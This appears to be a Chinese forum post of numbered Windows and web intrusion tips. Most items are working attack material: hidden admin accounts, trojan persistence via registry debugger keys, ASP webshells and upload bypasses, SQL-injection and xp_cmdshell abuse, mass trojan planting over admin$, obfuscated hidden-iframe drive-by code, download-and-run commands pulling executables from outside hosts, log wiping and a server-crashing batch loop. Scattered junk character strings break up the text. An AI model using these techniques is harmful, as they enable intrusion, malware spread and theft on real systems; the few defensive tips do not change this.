一些笔记

admin

1、Xp系统修改权限防止病毒或木马等破坏系统，cmd下，
cacls C:\windows\system32 /G hqw20:R
思是给hqw20这个用户只能读取SYSTEM32目录，但不能进行修改或写入
7 S- j% L3 {: V; a( [$ V恢复方法：C:\>cacls C:\windows\system32 /G hqw20:F

2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件，运行对话框中输入Iexpress。

3、内网使用灰鸽子，肉鸡上vidcs.exe -p端口，本地VIDCS里，VIDCS服务IP 填肉鸡的IP，VIDCS服务端口，就是给肉鸡开的端口，BINDIP添自己的内网IP，BIND端口 添8000，映射端口添8000。
4 j9 Z5 |( A2 h8 \  ^6 c, c
* ?7 Q) J1 l9 X  u$ a4、建立隐藏帐号，上次总结了用guest建立隐藏的管理员，这次再介绍一种，在cmd下建立一个ating$的用户，然后注册表下复制管理员的1F4里的F 值到ating$的F值，再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号

/ n8 z+ [! v( R5 G7 v& D" W1 V) Q5、利用INF文件来修改注册表
7 O4 S% W2 Q9 R( b[Version]
Signature="$CHICAGO$"
[Defaultinstall]
$ {; y- @8 I+ B; ~8 I, OaddREG=Ating
[Ating]
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
以上代码保存为inf格式，注意没有换行符，在命令行里导入inf的命令如下：
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
2 w& b+ E5 i# B其中HKEY_CLASSES_ROOT 简写为 HKCR，HKEY_CURRENT_USER 简写为 HKCU
4 P. q2 p+ U+ dHKEY_LOCAL_MACHINE 简写为 HKLM，HKEY_USERS 简写为 HKU
; T( N& J) i: ?. u+ \* }HKEY_CURRENT_CONFIG 简写为 HKCC
! Z- E; H+ k; w1 g0x00000000 代表的是 字符串值，0x00010001 代表的是 DWORD值
"1"这里代表是写入或删除注册表键值中的具体数据
$ I1 W/ I- F- q! S9 {
6、关于制作穿xp2防火墙的radmin，大家一定要会，各大黑客网站都有动画,
4 X2 k7 H( c  b6 l! g0 K5 r多了一步就是在防火墙里添加个端口，然后导出其键值
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
. `+ I% j+ b( J. `+ V3 B" e
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项，再在service.exe项建立一个Debugger的键（字符串值），键值填ating.exe的全路径。
5 U$ n0 B/ C  V) X  A9 E
1 ]- o5 e8 ]) x* }, T2 [8、将ftp.exe传到服务器用来提权，可以先把它变成ating.gif格式的再用，迷惑管理员。

( C& V, H, H/ K4 Q2 ]3 F8 g3 x" m9、有时候在我们进入了网站后台，但是没有上传图片和备份等功能，得不到webshell,
# c: q* g( i8 R3 k6 v! W+ L可是不能白来一场，可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。

- s5 d8 y( D5 J! G# h6 _8 D( [10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”

7 ?8 ]' u! k) i$ E3 M1 {11、我们中了盗密码的木马后不要急于删除，一般这些木马都是把密码发到指定邮箱，我们可以用探嗅软件来找到邮箱的用户名和密码，比如安全焦点的xsniff，
用法：xsniff –pass –hide –log pass.txt
* y" I6 W0 m- e8 T
12、google搜索的艺术
搜索关键字：“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
或“字符串的语法错误”可以找到很多sql注入漏洞。

13、还可以搜一些木马的关键字，比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。

% m) u# W7 Y$ U* h! n8 `& @( ?14、cmd中输入 nc –vv –l –p 1987
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃

* ^7 k2 ]4 @( ^4 P& `15、制作T++木马，先写个ating.hta文件,内容为
1 U3 q1 V7 n: @- |<script language="VBScript">
! D/ k% R" D0 `6 O  w5 aset wshshell=createobject ("wscript.shell" )
a=wshshell.run("你马的名称",1)
: c/ c! H2 x9 k6 H, bwindow.close
</script>
) |6 X: ^, m3 v7 O7 |2 I2 |, h  G$ |1 M再用mshta生成T++木马，命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
' q1 c% M8 M9 B* W
' D) g  n% d3 a16、搜索栏里输入
. q4 p+ e/ \* d$ j  V5 K1 u关键字%'and 1=1 and '%'='
, ?0 b7 z  m0 Z( @0 [/ y关键字%'and 1=2 and '%'='
% v* S( y) O. f* P* G& _: v比较不同处 可以作为注入的特征字符
* v# d' E" T7 W2 Z
/ s9 `3 ^7 i9 T2 D17、挂马代码<html>
% m7 t+ K$ g4 B$ P6 z1 K<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
! M0 e9 o; H& r2 x1 u: R</html>

18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
7 h. _5 ^! e5 j" Q7 gnet localgroup administrators还是可以看出Guest是管理员来。

3 A  X( S: Y- d$ h) q8 B8 N19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
用法: 安装： instsrv.exe 服务名称 路径
卸载： instsrv.exe 服务名称 REMOVE
7 S- N: }: [( e$ F4 r* b
1 G0 i& |2 E# j
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
不能注入时要第一时间想到%5c暴库。

, C/ `, n6 d2 D* y% r% y2 }! T$ F22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测，也就是说，他会检测文件是不是有.jpg，那么我们要是把文件改成：ating.jpg.asp试试。。由于还是ASP结尾，所以木马不会变~

23、缺少xp_cmdshell时
4 V( j+ W' e) }1 }/ \尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
2 x" y" b- ^; x) H( J' k4 D7 K' \假如恢复不成功,可以尝试直接加用户(针对开3389的)
declare @o int
exec sp_oacreate 'wscript.shell',@o out
9 o" u- x0 w7 eexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
6 S) p+ @+ E1 e! O
24.批量种植木马.bat
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
3 s  R5 a. C6 Q& [; n- g2 kfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
; a# d9 \( k: J5 n扫描地址.txt里每个主机名一行 用\\开头
! T6 }; ^- O6 P. w( t
; N2 H7 Q9 L- ?; X1 x25、在程序上传shell过程中，程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下： <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
" O! H1 y3 H9 z/ Z, _
' \/ ^2 h/ E9 W& c% i  X  M26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
! o9 N1 h$ n. ?
; L& s* b9 M, L27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
' |9 N2 p3 @0 k/ q$ y然后用#clear logg和#clear line vty *删除日志
9 V' ~4 e; y; p, W9 f
28、电脑坏了省去重新安装系统的方法
纯dos下执行，
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
4 K8 H! z' ~; C: T2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config

5 H+ M+ T! n! {( S) K29、解决TCP/IP筛选 在注册表里有三处，分别是：
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
$ U- D' N: s; |' wHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
% R4 B! u  ?( C! Z分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
8 v0 ~* u9 Q+ r0 `7 o# Z# vregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
& {  ~8 W9 d& s1 `. n: ^4 zregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
命令来导出注册表项
然后把三个文件里的EnableSecurityFilters"=dword:00000001，
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
) g! ^% }9 I* J4 ^regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
3 L& J& S# s/ N8 ~
6 _# H* f7 h0 n5 r- F30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
2 G1 G& c8 `% y$ I; o* F6 ~- j- E
31、全手工打造开3389工具
+ m7 x2 d3 p2 h$ B  d6 I& w0 {打开记事本，编辑内容如下：
7 O3 m9 g( |1 r2 _+ ^- Z6 |echo [Components] > c:\sql
1 w' t5 N' p1 q0 I+ Y2 E  ?3 [echo TSEnable = on >> c:\sql
1 B4 j! T; z2 ksysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
编辑好后存为BAT文件，上传至肉鸡，执行
- f: m1 Q/ k8 K9 w# L2 a
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马

2 l9 q3 }: c3 ~0 f# n! u3 E33、让服务器重启
写个bat死循环:
1 X  K( P& }" a8 K' L@echo off
: u; D: P3 q! |& l. ]8 g:loop1
cls
* b6 N2 y  b2 K$ k7 Lstart cmd.exe
3 I. G( ?/ ~4 Y7 T' Cgoto loop1
" q7 D" W  T' S$ k: ^9 \. v  |  ^保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启

34、如果你登录肉鸡的3389时发现有cmd一闪而过，那你可要小心了，管理员写了个bat在监视你，
@echo off
  r; M3 n4 F, A; ?, R: ?! Ndate /t >c:/3389.txt
4 ~- j# N3 s& n% b7 f- N- ttime /t >>c:/3389.txt
attrib +s +h c:/3389.bat
' M. s2 z! Z$ |# sattrib +s +h c:/3389.txt
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
并保存为3389.bat
, W! w, C3 O( [1 n4 o# D打开注册表找到：Userinit这个键值 在末尾加入3389.bat所在的位置，比如我放到C盘，就写：,c:/3389.bat,注意一定要加个逗号

35、有时候提不了权限的话，试试这个命令，在命令行里输入：
( u- i- G8 X3 Z3 cstart http://www.hack520.org/muma.htm然后点执行。（muma.htm是你上传好的漏洞网页）
输入：netstat -an | find "28876" 看看是否成功绑定，如果有就telnet上去，就有了system权限，当然也可以nc连接，本地执行命令。
+ v  V7 r/ P  s/ ]8 K5 S5 G
( ~2 \0 O$ u0 y' b% m, f# X$ n36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
9 P6 q) t  Y* h' Mecho 你的FTP账号 >>c:\1.bat //输入账号
echo 你的FTP密码 >>c:\1.bat //输入密码
* D; q8 ?9 z4 z* B3 J0 S' M4 Qecho bin >>c:\1.bat //登入
5 N- H* E% C8 N9 Xecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
echo bye >>c:\1.bat //退出
3 v& g7 x5 Q1 ^) _% |3 J) F然后执行ftp -s:c:\1.bat即可
( t3 \! _. u9 a
37、修改注册表开3389两法
（1）win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
- J! l0 u) ]: }! u3 ENT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
. U" ]  ]6 [3 A: j" o9 p; U6 Zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
. Y  z: P; q; [! S>>3389.reg
. D: S7 }8 p/ U& \+ F( Q2 s: Necho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
" Y4 d% L5 s" E0 H# qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
>>3389.reg
% H8 t6 E+ _2 I' h: Yecho "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
>>3389.reg
9 Y! d$ K" K0 Z+ |' x4 U% V* Fecho "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
- f% E3 S* G' j( x* B) m' H* pecho "Hotkey"="1" >>3389.reg
1 T1 W! Y, `- c3 [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 U" r! x& g) b$ s1 ^; qServer\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ d) V0 c' `6 R) u( L2 s1 IServer\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件，接着regedit /s 3389.reg导入注册表。
9 K: T4 n3 u) x* s6 ~(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
/ p/ ~* L; p$ b. M6 d4 s因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
（2）winxp和win2003终端开启
& ]- G; i% w5 U5 D" u; E. o用以下ECHO代码写一个REG文件：
* l4 c/ {1 b5 a) o% R9 }5 Jecho Windows Registry Editor Version 5.00>>3389.reg
2 l, M4 n( [6 t" c' V. I4 w7 Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* F  e( c8 S* q" AServer]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
7 S6 J7 K( m7 W' I0 @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 A, H7 O; O/ t" S) _Server\Wds\rdpwd\Tds\tcp]>>3389.reg
/ P2 E! O) U* iecho "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
# V4 S* d3 B4 D+ {1 o5 Y: A+ k0 w然后regedit /s 3389.reg del 3389.reg
XP下不论开终端还是改终端端口都不需重启
/ M" S& U) i5 Q9 Q4 F0 ?' c
38、找到SA密码为空的肉鸡一定要第一时间改SA密码，防止别人和我们抢肉吃
9 q3 z! L7 Z6 _/ b( P6 B% O% ]/ h- u用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'

- e5 \2 B/ V+ c39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的！
! b1 o* L5 ~, U2 }3 p（1）数据库文件名应复杂并要有特殊字符
# E; `- w& |9 C$ t' s6 v+ z5 B. u. a（2）不要把数据库名称写在conn.asp里，要用ODBC数据源
将conn.asp文档中的
DBPath = Server.MapPath("数据库.mdb")
/ g4 c2 k" K# dconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" ＆ DBPath

4 K/ a7 `: H# K# N% k6 [修改为：conn.open "ODBC数据源名称," 然后指定数据库文件的位置
（3）不放在WEB目录里
1 w5 j2 s; D! V) h( \
40、登陆终端后有两个东东很危险，query.exe和tsadmin.exe要Kill掉
可以写两个bat文件
5 R# L6 o5 M6 c! i9 N@echo off
7 N+ ?) z$ m( q: l0 a@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
. a& P0 e; F+ {@del c:\winnt\system32\query.exe
# s' k7 Y. c4 s* X0 y@del %SYSTEMROOT%\system32\dllcache\query.exe
  q, R& K8 r/ Z, M" O* C@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的

% X: P2 {( d. \! T2 G@echo off
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
@del c:\winnt\system32\tsadmin.exe
, R4 r# R  q9 q@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
+ R( R# v5 B- [% G% K1 o( C/ l, @4 W
" [/ \1 V' P% Y41、映射对方盘符
: T+ }* Y& v' g, Btelnet到他的机器上，
net share 查看有没有默认共享 如果没有，那么就接着运行
net share c$=c:
: G- p: p8 l3 h/ \' Lnet share现在有c$
5 r7 a' t: g& A4 X7 A" o: A在自己的机器上运行
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘，盘符为K
, _2 ~! [, r. {3 K
42、一些很有用的老知识
type c:\boot.ini ( 查看系统版本 )
2 K8 M/ {9 ?) d$ O, b1 X, r% Xnet start (查看已经启动的服务)
& d2 \5 l! X0 o7 Z' Lquery user ( 查看当前终端连接 )
net user ( 查看当前用户 )
# K; g. U' w" g, o+ B$ [, Dnet user 用户 密码/add ( 建立账号 )
net localgroup administrators 用户 /add (提升某用户为管理员)
ipconfig -all ( 查看IP什么的 )
netstat -an ( 查看当前网络状态 )
4 X; D* a1 W8 ]5 }/ N6 U* x9 Efindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
! r* R' H' g. h" X克隆时Administrator对应1F4
* l& a4 K- t2 o6 s+ G0 G/ ?  A/ Qguest对应1F5
tsinternetuser对应3E8

. u2 e" g* _* n% K2 O- X7 G- H6 {43、如果对方没开3389，但是装了Remote Administrator Service
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
解释：用serv-u漏洞导入自己配制好的radmin的注册表信息
' \. s+ ]8 Q3 `) s5 d先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"

: a' X. b6 Z0 z; D44、用lcx做内网端口映射，先在肉鸡上监听 lcx -listen 52 8089 (端口自定）
* l1 [3 z) u6 Z本地上运行映射，lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口）
5 \3 J, |+ Q- V# @+ W4 p/ q
* B! u3 }. Z6 v! M9 k  P45、在服务器写入vbs脚本下载指定文件（比如用nbsi利用注入漏洞写入）
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
+ _" C- T. l( W; r^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
: v4 {6 |$ H& [% T+ t2 {CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
8 q8 Y+ E* O" u) `+ D（这是完整的一句话，其中没有换行符）
然后下载:
. E% B, R0 b% n% \, x/ Zcscript down.vbs http://www.hack520.org/hack.exe hack.exe
( Y3 N$ E" E, _+ h2 I1 Z4 X2 C% m" l7 `
, ]: d: Y1 `+ V6 Y' p# e46、一句话木马成功依赖于两个条件：
１、服务端没有禁止adodb.Stream或FSO组件
2 ^0 {8 F4 y) }: e6 u２、权限问题：如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。

0 x  Y" Q2 ?0 l; l* N. M1 c47、利用DB_OWNER权限进行手工备份一句话木马的代码：
;alter database utsz set RECOVERY FULL--
4 d- u  S* d- R2 C0 U9 D( p;create table cmd (a image)--
;backup log utsz to disk = 'D:\cmd' with init--
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
注：0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。

48、tlntadmn是telnet服务的设置命令，可以对telnet服务的端口、认证方式等进行设置：
# ^; g( q4 u, Z& L( z" v
. h  S4 l: g0 A; ^1 N用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
3 F! v3 g' d- m' l5 N2 S( C所有会话用 'all'。
/ g. Y6 ~. D9 w-s sessionid 列出会话的信息。
% ~: a1 C3 W2 l+ O# D) s-k sessionid 终止会话。
-m sessionid 发送消息到会话。
+ P# K0 e( k6 F- z0 O$ M, _
config 配置 telnet 服务器参数。
/ Z; B# O9 M& b, I3 S9 N% Y2 q
common_options 为:
! W5 M( J/ T* v# E" H-u user 指定要使用其凭据的用户
-p password 用户密码

config_options 为:
dom = domain 设定用户的默认域
7 k" U' h# v4 x, wctrlakeymap = yes|no 设定 ALT 键的映射
5 F! |7 S0 B6 Y. P1 T2 Mtimeout = hh:mm:ss 设定空闲会话超时值
2 K4 P6 m' H3 g/ J5 E; |) Ktimeoutactive = yes|no 启用空闲会话。
5 B/ x9 p% g) i, Fmaxfail = attempts 设定断开前失败的登录企图数。
; f, N" P3 ]$ M" F6 Imaxconn = connections 设定最大连接数。
port = number 设定 telnet 端口。
sec = [+/-]NTLM [+/-]passwd
3 c9 a  R& ~* @5 v# {' b设定身份验证机构
- l& |1 n% r& i; g! Q. z% o# Ifname = file 指定审计文件名。
0 U6 X. b7 ?, G. cfsize = size 指定审计文件的最大尺寸(MB)。
* D# J4 S( q6 m; v$ kmode = console|stream 指定操作模式。
auditlocation = eventlog|file|both
指定记录地点
audit = [+/-]user [+/-]fail [+/-]admin

3 n% @, o! a7 Y6 ]" _4 o49、例如:在IE上访问:
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
hack.txt里面的代码是：
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
9 f3 A  Z; |" o1 O- o. ?9 s把这个hack.txt发到你空间就可以了！
这个可以利用来做网马哦！
( [4 w8 R7 V8 W! A; n1 D: p
50、autorun的病毒可以通过手动限制！
1，养成好习惯，插入U盘或移动硬盘，都要按住shift让其禁止自动运行！
/ a% n8 P+ f5 {# g( Z, x3 a- c2，打开盘符用右键打开！切忌双击盘符～
+ M8 k) |2 G& T" n; n3，可以利用rar软件查看根目录下autorun病毒并删除之！他可以处理一些连右键都无法打开的分区！
, R/ L" c! L$ A8 V+ u  \
51、log备份时的一句话木马：
4 A6 Q( E. T, b  ?$ a' ~, g3 j& La).<%%25Execute(request("go"))%%25>
6 b: m- X: G0 Cb).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
7 J. u! O2 r5 A- Gd).<script language=VBScript runat=server>execute request("sb")</Script>
2 \5 D$ T' S% O9 Fe).<%25Execute(request("l"))%25>
f).<%if request("cmd")<>"" then execute request("pass")%>
, P* e4 i7 l( a' f0 U& I0 ^; e
52、at "12:17" /interactive cmd
执行后可以用AT命令查看新加的任务
6 B) t% M- r  b* \5 T" E. k! x用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
6 v8 v$ S  X( u+ o
4 L5 v2 U% M% Q4 i. F6 U53、隐藏ASP后门的两种方法
1、建立非标准目录：mkdir images..\
拷贝ASP木马至目录：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通过web访问ASP木马：http://ip/images../news.asp?action=login
/ z- H$ R' \0 Z$ b8 a- s如何删除非标准目录：rmdir images..\ /s
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析，以达到我们隐藏自己的网页后门的目的:
9 ~1 a# f" b, i6 z* v8 b  Amkdir programme.asp
新建1.txt文件内容：<!--#include file=”12.jpg”-->
& @7 Y9 L; k1 a新建12.jpg文件内容：<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
5 y# d7 ?0 @, V& M2 q  Rattrib +H +S programme.asp
4 B8 e7 e! E/ F7 U+ _' Z通过web访问ASP一句话木马：http://ip/images/programme.asp/1.txt
$ [3 B" w# J/ i0 V( W  v
54、attrib /d /s c:\windows +h +s，后windows目录变为隐藏＋系统，隐藏属性为灰不可更改，windows目录下面的文件和目录并没有继承属性，原来是什么样还是什么样。
9 o4 L2 G# h# d" ?! y然后在利用attrib /d /s c:\windows -h -s，windows目录可以显示，隐藏属性可以再次选中。

55、JS隐蔽挂马
9 q/ l& A# b% b7 K0 c- `1.
  e5 P8 f+ Q2 q, l, u. |2 qvar tr4c3="<iframe src=ht";
tr4c3 = tr4c3+"tp:/";
5 t4 G. s, p8 f/ \; [3 d- x8 G) Ltr4c3 = tr4c3+"/ww";
tr4c3 = tr4c3+"w.tr4";
$ w. N( a% H9 S- t& o: Ptr4c3 = tr4c3+"c3.com/inc/m";
tr4c3 = tr4c3+"m.htm style="display:none"></i";
2 d9 r/ Z6 M) R% |tr4c3 =tr4c3+"frame>'";
1 i3 P- N" T7 U3 @4 r9 [" rdocument.write(tr4c3);
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些，混淆度增加。

* b" `4 `8 a4 I( ?/ U) N# T2.
2 C! s9 M/ b0 X/ `/ Y' w4 u; b2 L2 f! F转换进制，然后用EVAL执行。如
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
$ r6 W, B4 o* Q/ l不过这个有点显眼。
3.
' o4 J, W/ [2 {( s# Idocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
最后一点，别忘了把文件的时间也修改下。
( r+ A/ U; m) b8 Z. Q8 o1 H
56.3389终端入侵常用DOS命令
( c' _+ _2 {% H6 Ktaskkill taskkill /PID 1248 /t
1 u1 B+ m+ v$ K, V# Z" a; u
* S0 _' }! a* n. Dtasklist 查进程
2 a" X  I$ w5 @9 ]+ |3 S, C
  z$ k0 R3 @( T5 a7 Y0 _cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
iisreset /reboot
* E. @. w) ^) E) jtsshutdn /reboot /delay:1    重起服务器

logoff 12 要使用会话 ID（例如，会话 12）从会话中注销用户，
& k- b: g5 S9 X+ o
$ Q  C& n; O) H5 d/ h4 @query user 查看当前终端用户在线情况

0 U5 ]- a1 P1 ?) e  ?6 l$ n8 F% d6 w要显示有关所有会话使用的进程的信息，请键入：query process *
: w1 l; r* E# ?; E
5 \4 c) s% M  a! k& {; P要显示有关会话 ID 2 使用的进程的信息，请键入：query process /ID:2

. c( e% o* O4 ?2 R3 p要显示有关服务器 SERVER2 上所有活动会话的信息，请键入：query session /server:SERVER2
3 U: S9 \4 J1 R* T. X' c
要显示有关当前会话 MODEM02 的信息，请键入：query session MODEM02
, s( \) ~& G# i: v
+ s. g8 v; \+ S' F3 c命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启

命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
- T; G: [/ i; G5 v: z2 d! Q
# G/ f4 S: W# o8 \0 U  [) W命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。

; f$ s& z/ h3 k' s4 h' a8 c$ l) U* `命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机

56、在地址栏或按Ctrl+O，输入：
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
- r: p  F, G% K) F8 ?
源代码就出来了。不论加密如何复杂，最终都要还原成浏览器可以解析的html代码，而documentElement.outerHTML正是最终的结果。
, s4 A" |% h1 l$ Z) p
6 B2 B- r) A8 J5 \57、net user的时候，是不能显示加$的用户，但是如果不处理的话，
6 ?4 S& X4 |1 Y# U) ~9 l/ W) B' W7 Y用net localgroup administrators是可以看到管理组下，加了$的用户的。
  G- A! u( t& F; E+ y- \; m: s
+ E/ V* L8 r7 Z58、 sa弱口令相关命令

一.更改sa口令方法：
* I' b' q  `8 y6 A# R+ Q( `8 @用sql综合利用工具连接后，执行命令：
! v2 o# w9 y% X" [  Sexec sp_password NULL,'20001001','sa'
4 G" W, A6 }2 y8 \8 r! d(提示：慎用!)
3 [! D. S3 s" m7 f% {8 Q5 N0 W
二.简单修补sa弱口令.

( l; r, L) E& N3 L' R方法1:查询分离器连接后执行：
7 e% ~" F1 _/ H6 A4 i$ m3 hif exists (select * from
8 {  W. Q* K4 {: N8 V- Z; f4 Ndbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
* ?* i0 O' w8 L" u, Z7 IOBJECTPROPERTY(id, N'IsExtendedProc') = 1)

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
' I2 A! F$ I5 G4 X# R3 Q
GO
6 l% ?% W( |7 B( `4 I3 O( A0 _
然后按F5键命令执行完毕
! |* w( ?0 |0 r3 F0 z1 q6 [
" e' b8 z# m: j0 i+ N6 m5 B' W方法2:查询分离器连接后
第一步执行：use master
' o: k2 o! H. M3 s0 ^/ x5 P  c* P第二步执行：sp_dropextendedproc 'xp_cmdshell'
然后按F5键命令执行完毕


